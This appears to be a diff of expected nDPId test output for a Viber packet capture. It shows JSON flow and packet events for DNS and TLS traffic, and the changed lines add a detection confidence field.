-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1527155639237,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.166.226"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1527155639237,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.166.226"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639240,"flow_last_seen":1527155639240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155639240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1527155639240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155639240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8C6FAAEAGkTrAqAARNkWm4pB6Abv8W2quAAAAAKAC\/\/9PrwAAAgQFtAQCCAoAIWEPAAAAAAEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1527155639414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155639414,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHpPMSQJ\/Ftqr6ASaN+BOQAAAgQFtAQCCApMsKWZACFhDwEDAwg="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1527155639417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155639417,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0C6JAAEAGkUHAqAARNkWm4pB6Abv8W2qvTzEkCoAQAq0WDQAAAQEICgAhYTtMsKWZ"}
-00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01230{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}}
+00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155640085,"flow_last_seen":1527155640085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155640085,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1527155640085,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155640085,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8sZJAAEAG60jAqAARNkWm4pB8Abt0c9BwAAAAAKAC\/\/9xAAAAAgQFtAQCCAoAIWHiAAAAAAEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1527155640261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155640261,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHz0FjHkdHPQcaASaN\/u9gAAAgQFtAQCCApMsKZsACFh4gEDAwg="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1527155640264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155640264,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0sZNAAEAG60\/AqAARNkWm4pB8Abt0c9Bx9BYx5YAQAq2DyQAAAQEICgAhYg9MsKZs"}
-00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1527155641574,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1527155641574,"pkt":"AA6OMNv9MAdNo1+nCABFAABBH3ZAAEARmcXAqAARwKgAD5IqADUALZxVyU0BAAABAAAAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAQ=="}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1527155641691,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"ts_msec":1527155641691,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXEZAAEARXIvAqAAPwKgAEQA1kioAlzNhyU2BgAABAAUAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAcAMAAUAAQAACsAAHg1kbzJneTJrd2FrOWsyCmNsb3VkZnJvbnQDbmV0AMAxAAEAAQAAADsABDbmXWDAMQABAAEAAAA7AAQ25l2mwDEAAQABAAAAOwAENuZdIsAxAAEAAQAAADsABDbmXaA="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1527155641691,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.96"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1527155641691,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.96"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641697,"flow_last_seen":1527155641697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155641697,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1527155641697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155641697,"pkt":"AA6OMNv9MAdNo1+nCABFAAA825FAAEAGCivAqAARNuZdYOCwAbu7GrjkAAAAAKAC\/\/84\/wAAAgQFtAQCCAoAIWN1AAAAAAEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1527155641714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155641714,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMbw25l1gwKgAEQG74LAWDyy+uxq45aAScSCWXAAAAgQFtAQCCAp+anA4ACFjdQEDAwg="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1527155641716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155641716,"pkt":"AA6OMNv9MAdNo1+nCABFAAA025JAAEAGCjLAqAARNuZdYOCwAbu7GrjlFg8sv4AQAq0zmAAAAQEICgAhY3p+anA4"}
-00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00871{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01132{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}}
+00840{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
